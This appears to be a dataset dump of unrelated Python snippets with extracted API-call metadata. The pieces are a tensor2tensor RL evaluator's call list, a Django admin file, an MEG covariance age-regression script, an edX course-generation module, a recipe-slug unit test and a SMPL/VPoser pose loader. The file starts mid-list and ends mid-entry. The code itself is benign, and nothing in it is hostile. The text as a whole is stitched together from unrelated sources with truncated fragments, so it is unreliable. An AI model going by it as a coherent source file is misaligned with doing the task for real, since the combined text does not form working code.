] | [((3123, 3255), 'tensorflow.contrib.training.HParams', 'tf.contrib.training.HParams', ([], {'num_rollouts': '(1)', 'planning_horizon': '(2)', 'rollout_agent_type': '"""random"""', 'batch_size': '(1)', 'env_type': '"""simulated"""'}), "(num_rollouts=1, planning_horizon=2,\n rollout_agent_type='random', batch_size=1, env_type='simulated')\n", (3150, 3255), True, 'import tensorflow as tf\n'), ((3346, 3481), 'tensorflow.contrib.training.HParams', 'tf.contrib.training.HParams', ([], {'num_rollouts': '(64)', 'planning_horizon': '(16)', 'rollout_agent_type': '"""policy"""', 'batch_size': '(64)', 'env_type': '"""simulated"""'}), "(num_rollouts=64, planning_horizon=16,\n rollout_agent_type='policy', batch_size=64, env_type='simulated')\n", (3373, 3481), True, 'import tensorflow as tf\n'), ((6676, 6715), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (['eval_metrics_dir'], {}), '(eval_metrics_dir)\n', (6697, 6715), True, 'import tensorflow as tf\n'), ((7111, 7176), 'tensor2tensor.rl.rl_utils.evaluate_all_configs', 'rl_utils.evaluate_all_configs', (['loop_hparams', 'policy_dir'], {}), '(loop_hparams, policy_dir, **kwargs)\n', (7140, 7176), False, 'from tensor2tensor.rl import rl_utils\n'), ((7189, 7253), 'tensor2tensor.rl.rl_utils.summarize_metrics', 'rl_utils.summarize_metrics', (['eval_metrics_writer', 'eval_metrics', '(0)'], {}), '(eval_metrics_writer, eval_metrics, 0)\n', (7215, 7253), False, 'from tensor2tensor.rl import rl_utils\n'), ((8203, 8265), 'tensorflow.logging.info', 'tf.logging.info', (["('Getting game %d from %s.' % (game_id, games))"], {}), "('Getting game %d from %s.' % (game_id, games))\n", (8218, 8265), True, 'import tensorflow as tf\n'), ((8313, 8336), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (8334, 8336), False, 'import datetime\n'), ((8397, 8467), 'tensor2tensor.utils.trainer_lib.create_hparams', 'trainer_lib.create_hparams', (['FLAGS.loop_hparams_set', 'FLAGS.loop_hparams'], {}), '(FLAGS.loop_hparams_set, FLAGS.loop_hparams)\n', (8423, 8467), False, 'from tensor2tensor.utils import trainer_lib\n'), ((8794, 8870), 'tensor2tensor.utils.trainer_lib.create_hparams', 'trainer_lib.create_hparams', (['FLAGS.planner_hparams_set', 'FLAGS.planner_hparams'], {}), '(FLAGS.planner_hparams_set, FLAGS.planner_hparams)\n', (8820, 8870), False, 'from tensor2tensor.utils import trainer_lib\n'), ((9749, 9790), 'tensorflow.logging.set_verbosity', 'tf.logging.set_verbosity', (['tf.logging.INFO'], {}), '(tf.logging.INFO)\n', (9773, 9790), True, 'import tensorflow as tf\n'), ((9793, 9805), 'tensorflow.app.run', 'tf.app.run', ([], {}), '()\n', (9803, 9805), True, 'import tensorflow as tf\n'), ((5511, 5573), 'tensor2tensor.rl.rl_utils.BatchStackWrapper', 'rl_utils.BatchStackWrapper', (['env', 'loop_hparams.frame_stack_size'], {}), '(env, loop_hparams.frame_stack_size)\n', (5537, 5573), False, 'from tensor2tensor.rl import rl_utils\n'), ((5595, 5712), 'tensor2tensor.models.research.rl.make_simulated_env_kwargs', 'rl.make_simulated_env_kwargs', (['base_env', 'loop_hparams'], {'batch_size': 'planner_hparams.batch_size', 'model_dir': 'model_dir'}), '(base_env, loop_hparams, batch_size=\n planner_hparams.batch_size, model_dir=model_dir)\n', (5623, 5712), False, 'from tensor2tensor.models.research import rl\n'), ((8645, 8699), 'tensorflow.logging.info', 'tf.logging.info', (["('Set game to %s.' % loop_hparams.game)"], {}), "('Set game to %s.' % loop_hparams.game)\n", (8660, 8699), True, 'import tensorflow as tf\n'), ((9162, 9193), 'os.path.join', 'os.path.join', (['cur_dir', '"""policy"""'], {}), "(cur_dir, 'policy')\n", (9174, 9193), False, 'import os\n'), ((9210, 9246), 'os.path.join', 'os.path.join', (['cur_dir', '"""world_model"""'], {}), "(cur_dir, 'world_model')\n", (9222, 9246), False, 'import os\n'), ((9270, 9315), 'os.path.join', 'os.path.join', (['cur_dir', "('evaluator_' + now_tag)"], {}), "(cur_dir, 'evaluator_' + now_tag)\n", (9282, 9315), False, 'import os\n'), ((9320, 9380), 'tensorflow.logging.info', 'tf.logging.info', (["('Writing metrics to %s.' % eval_metrics_dir)"], {}), "('Writing metrics to %s.' % eval_metrics_dir)\n", (9335, 9380), True, 'import tensorflow as tf\n'), ((6826, 6916), 'tensor2tensor.layers.common_video.WholeVideoWriter', 'common_video.WholeVideoWriter', ([], {'fps': '(10)', 'output_path': 'debug_video_path', 'file_format': '"""avi"""'}), "(fps=10, output_path=debug_video_path,\n file_format='avi')\n", (6855, 6916), False, 'from tensor2tensor.layers import common_video\n'), ((7415, 7556), 'tensor2tensor.rl.rl_utils.get_metric_name', 'rl_utils.get_metric_name', ([], {'sampling_temp': 'loop_hparams.eval_sampling_temps[0]', 'max_num_noops': 'loop_hparams.eval_max_num_noops', 'clipped': '(False)'}), '(sampling_temp=loop_hparams.eval_sampling_temps[0],\n max_num_noops=loop_hparams.eval_max_num_noops, clipped=False)\n', (7439, 7556), False, 'from tensor2tensor.rl import rl_utils\n'), ((9093, 9144), 'os.path.join', 'os.path.join', (['cur_dir', "('%d' % (FLAGS.worker_id + 1))"], {}), "(cur_dir, '%d' % (FLAGS.worker_id + 1))\n", (9105, 9144), False, 'import os\n'), ((9392, 9425), 'tensorflow.gfile.Exists', 'tf.gfile.Exists', (['eval_metrics_dir'], {}), '(eval_metrics_dir)\n', (9407, 9425), True, 'import tensorflow as tf\n'), ((9433, 9465), 'tensorflow.gfile.MkDir', 'tf.gfile.MkDir', (['eval_metrics_dir'], {}), '(eval_metrics_dir)\n', (9447, 9465), True, 'import tensorflow as tf\n'), ((3804, 3873), 'tensor2tensor.rl.rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames', 'rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames', ([], {}), '(**sim_env_kwargs)\n', (3855, 3873), False, 'from tensor2tensor.rl import rl_utils\n'), ((4351, 4424), 'tensor2tensor.rl.rl_utils.RandomAgent', 'rl_utils.RandomAgent', (['batch_size', 'env.observation_space', 'env.action_space'], {}), '(batch_size, env.observation_space, env.action_space)\n', (4371, 4424), False, 'from tensor2tensor.rl import rl_utils\n'), ((4501, 4621), 'tensor2tensor.rl.rl_utils.PolicyAgent', 'rl_utils.PolicyAgent', (['batch_size', 'env.observation_space', 'env.action_space', 'policy_hparams', 'policy_dir', 'sampling_temp'], {}), '(batch_size, env.observation_space, env.action_space,\n policy_hparams, policy_dir, sampling_temp)\n', (4521, 4621), False, 'from tensor2tensor.rl import rl_utils\n'), ((4999, 5048), 'tensor2tensor.rl.rl_utils.BatchStackWrapper', 'rl_utils.BatchStackWrapper', (['env', 'frame_stack_size'], {}), '(env, frame_stack_size)\n', (5025, 5048), False, 'from tensor2tensor.rl import rl_utils\n')] |
from django.contrib import admin
from grandchallenge.components.models import (
ComponentInterface,
ComponentInterfaceValue,
)
class ComponentInterfaceAdmin(admin.ModelAdmin):
list_display = (
"pk",
"title",
"slug",
"kind",
"default_value",
"relative_path",
)
readonly_fields = (
"default_value",
"relative_path",
)
class ComponentInterfaceValueAdmin(admin.ModelAdmin):
list_display = ("pk", "interface", "value", "file", "image")
readonly_fields = ("interface", "value", "file", "image")
admin.site.register(ComponentInterface, ComponentInterfaceAdmin)
admin.site.register(ComponentInterfaceValue, ComponentInterfaceValueAdmin)
| [
"django.contrib.admin.site.register"
] | [((592, 656), 'django.contrib.admin.site.register', 'admin.site.register', (['ComponentInterface', 'ComponentInterfaceAdmin'], {}), '(ComponentInterface, ComponentInterfaceAdmin)\n', (611, 656), False, 'from django.contrib import admin\n'), ((657, 731), 'django.contrib.admin.site.register', 'admin.site.register', (['ComponentInterfaceValue', 'ComponentInterfaceValueAdmin'], {}), '(ComponentInterfaceValue, ComponentInterfaceValueAdmin)\n', (676, 731), False, 'from django.contrib import admin\n')] |
import os.path as op
import numpy as np
import pandas as pd
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import RidgeCV
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import KFold, cross_val_score
import mne
from pyriemann.tangentspace import TangentSpace
import config_drago as cfg
meg = 'mag'
scale = 1e22
rank = 65
reg = 1e-6
seed = 42
n_jobs = 10
cv = KFold(n_splits=n_jobs, shuffle=True, random_state=seed)
def proj_covs_common(covs, picks, scale=scale, rank=rank, reg=reg):
covs = [d['covs'][:, picks][:, :, picks] for d in covs if 'subject' in d]
covs = scale * np.array(covs)
n_sub, n_fb, n_ch, n_ch = covs.shape
# covs2 = covs.reshape(n_sub*n_fb, n_ch, n_ch)
# covs_avg = np.mean(covs2, axis=0)
covs_avg = covs.mean(axis=1).mean(axis=0)
d, V = np.linalg.eigh(covs_avg)
d = d[::-1]
V = V[:, ::-1]
proj_mat = V[:, :rank].T
covs_proj = np.zeros((n_sub, n_fb, rank, rank))
for sub in range(n_sub):
for fb in range(n_fb):
covs_proj[sub, fb] = proj_mat @ covs[sub, fb] @ proj_mat.T
covs_proj[sub, fb] += reg * np.eye(rank)
return covs_proj
def proj_covs_ts(covs):
n_sub, n_fb, p, _ = covs.shape
covs_ts = np.zeros((n_sub, n_fb, (p*(p+1))//2))
for fb in range(n_fb):
covs_ts[:, fb, :] = TangentSpace(metric="wasserstein").fit(
covs[:, fb, :, :]).transform(covs[:, fb, :, :])
return covs_ts
file_covs = op.join(cfg.path_outputs, 'covs_allch_oas.float32.h5')
covs_allch = mne.externals.h5io.read_hdf5(file_covs) # (sub, fb, ch, ch)
info = np.load(op.join(cfg.path_data, 'info_allch.npy')).item()
picks = mne.pick_types(info, meg=meg)
covs = proj_covs_common(covs_allch, picks, scale=scale, rank=rank, reg=reg)
X = proj_covs_ts(covs)
X = X.reshape(len(X), -1)
info = pd.read_csv(op.join(cfg.path_data, 'participants.csv'))
subjects = [d['subject'] for d in covs_allch if 'subject' in d]
y = info.set_index('Observations').age.loc[subjects]
ridge = make_pipeline(StandardScaler(),
RidgeCV(alphas=np.logspace(-3, 5, 100)))
score = - cross_val_score(ridge, X, y, cv=cv,
scoring="neg_mean_absolute_error", n_jobs=n_jobs,
verbose=True)
| [
"numpy.linalg.eigh",
"numpy.eye",
"pyriemann.tangentspace.TangentSpace",
"mne.pick_types",
"os.path.join",
"sklearn.preprocessing.StandardScaler",
"numpy.array",
"numpy.zeros",
"mne.externals.h5io.read_hdf5",
"sklearn.model_selection.KFold",
"numpy.logspace",
"sklearn.model_selection.cross_val_score"
] | [((414, 469), 'sklearn.model_selection.KFold', 'KFold', ([], {'n_splits': 'n_jobs', 'shuffle': '(True)', 'random_state': 'seed'}), '(n_splits=n_jobs, shuffle=True, random_state=seed)\n', (419, 469), False, 'from sklearn.model_selection import KFold, cross_val_score\n'), ((1494, 1548), 'os.path.join', 'op.join', (['cfg.path_outputs', '"""covs_allch_oas.float32.h5"""'], {}), "(cfg.path_outputs, 'covs_allch_oas.float32.h5')\n", (1501, 1548), True, 'import os.path as op\n'), ((1562, 1601), 'mne.externals.h5io.read_hdf5', 'mne.externals.h5io.read_hdf5', (['file_covs'], {}), '(file_covs)\n', (1590, 1601), False, 'import mne\n'), ((1696, 1725), 'mne.pick_types', 'mne.pick_types', (['info'], {'meg': 'meg'}), '(info, meg=meg)\n', (1710, 1725), False, 'import mne\n'), ((842, 866), 'numpy.linalg.eigh', 'np.linalg.eigh', (['covs_avg'], {}), '(covs_avg)\n', (856, 866), True, 'import numpy as np\n'), ((948, 983), 'numpy.zeros', 'np.zeros', (['(n_sub, n_fb, rank, rank)'], {}), '((n_sub, n_fb, rank, rank))\n', (956, 983), True, 'import numpy as np\n'), ((1264, 1305), 'numpy.zeros', 'np.zeros', (['(n_sub, n_fb, p * (p + 1) // 2)'], {}), '((n_sub, n_fb, p * (p + 1) // 2))\n', (1272, 1305), True, 'import numpy as np\n'), ((1872, 1914), 'os.path.join', 'op.join', (['cfg.path_data', '"""participants.csv"""'], {}), "(cfg.path_data, 'participants.csv')\n", (1879, 1914), True, 'import os.path as op\n'), ((2056, 2072), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (2070, 2072), False, 'from sklearn.preprocessing import StandardScaler\n'), ((2147, 2250), 'sklearn.model_selection.cross_val_score', 'cross_val_score', (['ridge', 'X', 'y'], {'cv': 'cv', 'scoring': '"""neg_mean_absolute_error"""', 'n_jobs': 'n_jobs', 'verbose': '(True)'}), "(ridge, X, y, cv=cv, scoring='neg_mean_absolute_error',\n n_jobs=n_jobs, verbose=True)\n", (2162, 2250), False, 'from sklearn.model_selection import KFold, cross_val_score\n'), ((637, 651), 'numpy.array', 'np.array', (['covs'], {}), '(covs)\n', (645, 651), True, 'import numpy as np\n'), ((1639, 1679), 'os.path.join', 'op.join', (['cfg.path_data', '"""info_allch.npy"""'], {}), "(cfg.path_data, 'info_allch.npy')\n", (1646, 1679), True, 'import os.path as op\n'), ((2111, 2134), 'numpy.logspace', 'np.logspace', (['(-3)', '(5)', '(100)'], {}), '(-3, 5, 100)\n', (2122, 2134), True, 'import numpy as np\n'), ((1155, 1167), 'numpy.eye', 'np.eye', (['rank'], {}), '(rank)\n', (1161, 1167), True, 'import numpy as np\n'), ((1357, 1391), 'pyriemann.tangentspace.TangentSpace', 'TangentSpace', ([], {'metric': '"""wasserstein"""'}), "(metric='wasserstein')\n", (1369, 1391), False, 'from pyriemann.tangentspace import TangentSpace\n')] |
import sys, os
import tarfile
import shutil
from edx_gen import _edx_consts
from edx_gen import _read_metadata
from edx_gen import _write_structure
from edx_gen import _write_comps
from edx_gen import _write_comp_html
from edx_gen import _write_comp_checkboxes
from edx_gen import _write_comp_video
from edx_gen import _xml_google_doc
from edx_gen import _markdown
from edx_gen import _util
import __SETTINGS__
#--------------------------------------------------------------------------------------------------
# Text strings
WARNING = " WARNING:"
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def writeCompsForUnit(md_filepath, unit_filename):
# print("component_path", component_path)
# generate the files in the right folders
tree_snippets = _markdown.convertMd(md_filepath)
# check we have at least 2 snippets, the header and one component
if len(tree_snippets) <= 1:
print(WARNING, 'The markdown file does not seem to contain any components:', md_filepath)
# get the display name of the unit
first_h1_tag = list(tree_snippets[0].iter('h1'))[0]
unit_display_name = first_h1_tag.get('display_name')
# list to store all files
unit_comps = []
# process components
for i in range(1, len(tree_snippets)):
tree_snippet = tree_snippets[i]
# generate the files
new_filename = unit_filename + '_c' + str(i)
comp_files = _writeFilesForSnippet(md_filepath, new_filename, tree_snippet, unit_filename, unit_display_name)
unit_comps.extend(comp_files)
# return the result
return unit_comps
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def _writeFilesForSnippet(md_filepath, comp_filename, tree_snippet, unit_filename, unit_display_name):
meta_tag = None
comp_type = None
# meta_text = None
# get the h1 tags
h1_tags = list(tree_snippet.iter('h1'))
if len(h1_tags) == 0:
print(WARNING, 'The snippet does not start with any settings:', md_filepath)
return
# get the meta tag for the snippet
meta_tag = h1_tags[0] # the first h1 the should contain the meta data
# # check the meta tag text
# meta_text = meta_tag.text.strip()
# if meta_text == None or meta_text != 'UNIT':
# print(WARNING, 'The markdown file must start with the "UNIT" settings:', component_path)
# print(WARNING, 'Make sure that the first line of the markdown file is blank')
# get the type for this component
comp_type = meta_tag.get('type')
if comp_type == None or comp_type not in _edx_consts.METADATA_ENUMS['type']:
print(WARNING, 'The "type" setting is not recognised:', md_filepath)
print(WARNING, ' Found:', comp_type)
print(WARNING, ' Valid options:', _edx_consts.METADATA_ENUMS['type'])
# write xml and/or html files
if comp_type == 'html':
print(" |_ HTML COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_HTML_REQ, _edx_consts.COMP_HTML_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "html" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_html.writeXmlForHtmlComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'problem-checkboxes':
print(" |_ PROBLEM CHECKBOXES")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_PROB_QUIZ_REQ, _edx_consts.COMP_PROB_QUIZ_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "problem-checkboxes" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_PROBS_FOLDER
# return the list of files
return _write_comp_checkboxes.writeXmlForProbCheckboxesComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'video':
print(" |_ VIDEO COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(
md_filepath, meta_tag, _edx_consts.COMP_VIDEO_REQ, _edx_consts.COMP_VIDEO_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "video" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_VIDS_FOLDER
# for each language
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_video.writeXmlForVidComp(
md_filepath, comp_filename, settings, unit_filename)
elif comp_type == 'google-doc':
print(" |_ GOOGLE DOC COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_GOOGLE_DOC_REQ, _edx_consts.COMP_GOOGLE_DOC_OPT)
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "Google Doc" component:', md_filepath)
return
# in this case, no files are written
# we return the component tag instead
return _xml_google_doc.tagForGoogleDocComp(comp_filename, settings, unit_filename)
else:
print(WARNING, 'Component type not recognised:', comp_type, "in", md_filepath)
#--------------------------------------------------------------------------------------------------
| [
"edx_gen._write_comp_checkboxes.writeXmlForProbCheckboxesComp",
"edx_gen._markdown.convertMd",
"edx_gen._read_metadata.getMetaSettings",
"edx_gen._xml_google_doc.tagForGoogleDocComp",
"edx_gen._write_comp_html.writeXmlForHtmlComp",
"edx_gen._write_comp_video.writeXmlForVidComp"
] | [((903, 935), 'edx_gen._markdown.convertMd', '_markdown.convertMd', (['md_filepath'], {}), '(md_filepath)\n', (922, 935), False, 'from edx_gen import _markdown\n'), ((3218, 3330), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', (['md_filepath', 'meta_tag', '_edx_consts.COMP_HTML_REQ', '_edx_consts.COMP_HTML_OPT'], {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_HTML_REQ, _edx_consts.COMP_HTML_OPT)\n', (3248, 3330), False, 'from edx_gen import _read_metadata\n'), ((3784, 3891), 'edx_gen._write_comp_html.writeXmlForHtmlComp', '_write_comp_html.writeXmlForHtmlComp', (['md_filepath', 'comp_filename', 'tree_snippet', 'settings', 'unit_filename'], {}), '(md_filepath, comp_filename,\n tree_snippet, settings, unit_filename)\n', (3820, 3891), False, 'from edx_gen import _write_comp_html\n'), ((4059, 4181), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', (['md_filepath', 'meta_tag', '_edx_consts.COMP_PROB_QUIZ_REQ', '_edx_consts.COMP_PROB_QUIZ_OPT'], {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_PROB_QUIZ_REQ, _edx_consts.COMP_PROB_QUIZ_OPT)\n', (4089, 4181), False, 'from edx_gen import _read_metadata\n'), ((4603, 4726), 'edx_gen._write_comp_checkboxes.writeXmlForProbCheckboxesComp', '_write_comp_checkboxes.writeXmlForProbCheckboxesComp', (['md_filepath', 'comp_filename', 'tree_snippet', 'settings', 'unit_filename'], {}), '(md_filepath,\n comp_filename, tree_snippet, settings, unit_filename)\n', (4655, 4726), False, 'from edx_gen import _write_comp_checkboxes\n'), ((4878, 4992), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', (['md_filepath', 'meta_tag', '_edx_consts.COMP_VIDEO_REQ', '_edx_consts.COMP_VIDEO_OPT'], {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_VIDEO_REQ, _edx_consts.COMP_VIDEO_OPT)\n', (4908, 4992), False, 'from edx_gen import _read_metadata\n'), ((5521, 5614), 'edx_gen._write_comp_video.writeXmlForVidComp', '_write_comp_video.writeXmlForVidComp', (['md_filepath', 'comp_filename', 'settings', 'unit_filename'], {}), '(md_filepath, comp_filename, settings,\n unit_filename)\n', (5557, 5614), False, 'from edx_gen import _write_comp_video\n'), ((5768, 5892), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', (['md_filepath', 'meta_tag', '_edx_consts.COMP_GOOGLE_DOC_REQ', '_edx_consts.COMP_GOOGLE_DOC_OPT'], {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_GOOGLE_DOC_REQ, _edx_consts.COMP_GOOGLE_DOC_OPT)\n', (5798, 5892), False, 'from edx_gen import _read_metadata\n'), ((6195, 6270), 'edx_gen._xml_google_doc.tagForGoogleDocComp', '_xml_google_doc.tagForGoogleDocComp', (['comp_filename', 'settings', 'unit_filename'], {}), '(comp_filename, settings, unit_filename)\n', (6230, 6270), False, 'from edx_gen import _xml_google_doc\n')] |
import unittest
from recipe import utils
class UtilTestCase(unittest.TestCase):
def test_valid_project_slug(self):
project_slug = "Recipe0123456789_mock"
self.assertTrue(utils.valid_project_slug(project_slug))
project_slug = 'Recipe00000000000000000000000000000000000000000000'
self.assertTrue(utils.valid_project_slug(project_slug))
project_slug = ""
self.assertFalse(utils.valid_project_slug(project_slug))
project_slug = "Recipe000000000000000000000000000000000000000000001"
self.assertFalse(utils.valid_project_slug(project_slug))
project_slug = "-!@#$%^&*()_+"
self.assertFalse(utils.valid_project_slug(project_slug))
| [
"recipe.utils.valid_project_slug"
] | [((201, 239), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', (['project_slug'], {}), '(project_slug)\n', (225, 239), False, 'from recipe import utils\n'), ((345, 383), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', (['project_slug'], {}), '(project_slug)\n', (369, 383), False, 'from recipe import utils\n'), ((440, 478), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', (['project_slug'], {}), '(project_slug)\n', (464, 478), False, 'from recipe import utils\n'), ((586, 624), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', (['project_slug'], {}), '(project_slug)\n', (610, 624), False, 'from recipe import utils\n'), ((694, 732), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', (['project_slug'], {}), '(project_slug)\n', (718, 732), False, 'from recipe import utils\n')] |
import numpy as np
import cv2
import os.path as osp
import json
from human_body_prior.tools.model_loader import load_vposer
import torch
vposer_ckpt = '/Vol1/dbstore/datasets/a.vakhitov/projects/pykinect_fresh/smplify-x/smplify-x-data/vposer_v1_0/'
def load_avakhitov_fits_vposer(vposer, part_path, dev_lbl):
poses = np.load(part_path + '/poses.npy')[:-1]
face_expressions = np.load(part_path + '/expressions.npy')[:-1] * 1e2
betas = np.load(part_path + '/betas.npy')
fid_lst = np.load(part_path + '/fid_lst.npy')
with open(part_path + '/config.json', 'r') as f:
config = json.load(f)
# do we use vposer embeddings
is_vposer = config['is_vposer']
# gender of a subject
is_male = config['is_male']
# id of a device (used to decode the rigid pose of the device)
assert len(fid_lst) == len(poses), f'{len(fid_lst)} != {len(poses)}'
assert len(fid_lst) == len(face_expressions), f'{len(fid_lst)} != {len(face_expressions)}'
n = len(poses)
frame_index2fit_index = {
fid_lst[i]: i
for i in range(n)
}
# load the device pose
dev_lst = config['dev_lst']
dev_id = 0
while dev_lst[dev_id] != dev_lbl:
dev_id += 1
dev_orient = None
dev_trans = None
if dev_id > 0:
dev_orient = np.load(part_path + '/dev_orient.npy')
dev_trans = np.load(part_path + '/dev_trans.npy')
rot = poses[:, -3:]
trans = poses[:, -6:-3]
if is_vposer:
pose_body_vp = torch.tensor(poses[:, 0:32])
# convert from vposer to rotation matrices
pose_body_list = []
for i in range(n):
pose_body_mats = vposer.decode(pose_body_vp[i]).reshape(-1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros(63)
for i in range(0, pose_body_mats.shape[0]):
rot_vec, jac = cv2.Rodrigues(pose_body_mats[i])
pose_body[3 * i: 3 * i + 3] = rot_vec.reshape(-1)
pose_body_list.append(pose_body)
pose_body = np.array(pose_body_list)
pose_jaw = poses[:, 32:35]
pose_eye = poses[:, 35:41]
pose_hand = poses[:, 41:-6]
else:
pose_body = poses[:, 0:63]
pose_jaw = poses[:, 63:66]
pose_eye = poses[:, 66:72]
pose_hand = poses[:, 72:-6]
if dev_orient is not None:
for i in range(n):
rot_mat = cv2.Rodrigues(rot[i].reshape(3, 1))[0]
dev_mat = cv2.Rodrigues(dev_orient.reshape(3, 1))[0]
rot_mat = dev_mat @ rot_mat
rot[i] = cv2.Rodrigues(rot_mat)[0].reshape(-1)
trans[i] = (dev_mat @ trans[i].reshape(3, 1) + dev_trans.reshape(3, 1)).reshape(-1)
result = {
'global_rvec': rot,
'global_tvec': trans,
'body_pose': pose_body,
'hand_pose': pose_hand,
'jaw_pose': pose_jaw,
'eye_pose': pose_eye,
'face_expression': face_expressions,
'betas': betas,
'n': n,
'frame_index2fit_index': frame_index2fit_index,
'is_male': is_male,
'is_vposer': is_vposer
}
return result
def load_avakhitov_fits(dp, load_betas=True, load_body_poses=True, load_expressions=False, load_fid_lst=True):
result = dict()
for flag, k, fn_no_ext in [
[load_betas, 'betas', 'betas'],
[load_body_poses, 'body_poses', 'poses'],
[load_expressions, 'expressions', 'expressions'],
[load_fid_lst, 'fid_lst', 'fid_lst']
]:
if flag:
load_fp = osp.join(dp, f'{fn_no_ext}.npy')
try:
loaded = np.load(load_fp)
except:
print(load_fp)
raise Exception()
if fn_no_ext == 'poses':
#load the vposer model
if loaded.shape[1] == 69:
pose_body = loaded[:, 0:32]
else:
vposer, _ = load_vposer(vposer_ckpt, vp_model='snapshot')
vposer.eval()
pose_body_vp = torch.tensor(loaded[:, 0:32])
#convert from vposer to rotation matrices
pose_body_mats = vposer.decode(pose_body_vp).reshape(len(loaded), -1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros((pose_body_mats.shape[0], 63))
for i in range(0, pose_body_mats.shape[0]):
for j in range(0, pose_body_mats.shape[1]):
rot_vec, jac = cv2.Rodrigues(pose_body_mats[i,j])
pose_body[i, 3*j : 3*j+3] = rot_vec.reshape(-1)
result[k] = pose_body
result['global_rvecs'] = loaded[:, -3:]
result['global_tvecs'] = loaded[:, -6:-3]
result['n'] = len(loaded)
else:
result[k] = loaded
return result
def batch_rodrigues(rot_vecs, epsilon=1e-8, dtype=torch.float32):
''' Calculates the rotation matrices for a batch of rotation vectors
Parameters
----------
rot_vecs: torch.tensor Nx3
array of N axis-angle vectors
Returns
-------
R: torch.tensor Nx3x3
The rotation matrices for the given axis-angle parameters
'''
batch_size = rot_vecs.shape[0]
device = rot_vecs.device
angle = torch.norm(rot_vecs + 1e-8, dim=1, keepdim=True)
rot_dir = rot_vecs / angle
cos = torch.unsqueeze(torch.cos(angle), dim=1)
sin = torch.unsqueeze(torch.sin(angle), dim=1)
# Bx1 arrays
rx, ry, rz = torch.split(rot_dir, 1, dim=1)
K = torch.zeros((batch_size, 3, 3), dtype=dtype, device=device)
zeros = torch.zeros((batch_size, 1), dtype=dtype, device=device)
K = torch.cat([zeros, -rz, ry, rz, zeros, -rx, -ry, rx, zeros], dim=1) \
.view((batch_size, 3, 3))
ident = torch.eye(3, dtype=dtype, device=device).unsqueeze(dim=0)
rot_mat = ident + sin * K + (1 - cos) * torch.bmm(K, K)
return rot_mat
def get_selected_ids(id_sel_set, req_ids):
ss_sort = np.argsort(id_sel_set)
req_sort = np.argsort(req_ids)
id_ss_srt = id_sel_set[ss_sort]
id_ss_pos = np.arange(0, len(id_sel_set))[ss_sort]
req_srt = req_ids[req_sort]
req_srt_pos = -1 * np.ones(len(req_srt), dtype=int)
i = 0
j = 0
while i < len(id_ss_srt) and j < len(req_srt):
if req_srt[j] == id_ss_srt[i]:
req_srt_pos[j] = id_ss_pos[i]
i += 1
j += 1
elif req_srt[j] < id_ss_srt[i]:
j += 1
elif id_ss_srt[i] < req_srt[j]:
i += 1
req_ids_ans = -1 * np.ones(len(req_srt), dtype=int)
req_ids_ans[req_sort] = req_srt_pos
return req_ids_ans
| [
"torch.bmm",
"torch.split",
"human_body_prior.tools.model_loader.load_vposer",
"torch.eye",
"torch.sin",
"os.path.join",
"numpy.argsort",
"torch.tensor",
"torch.norm",
"numpy.array",
"torch.cos",
"numpy.zeros",
"cv2.Rodrigues",
"json.load",
"numpy.load",
"torch.zeros",
"torch.cat"
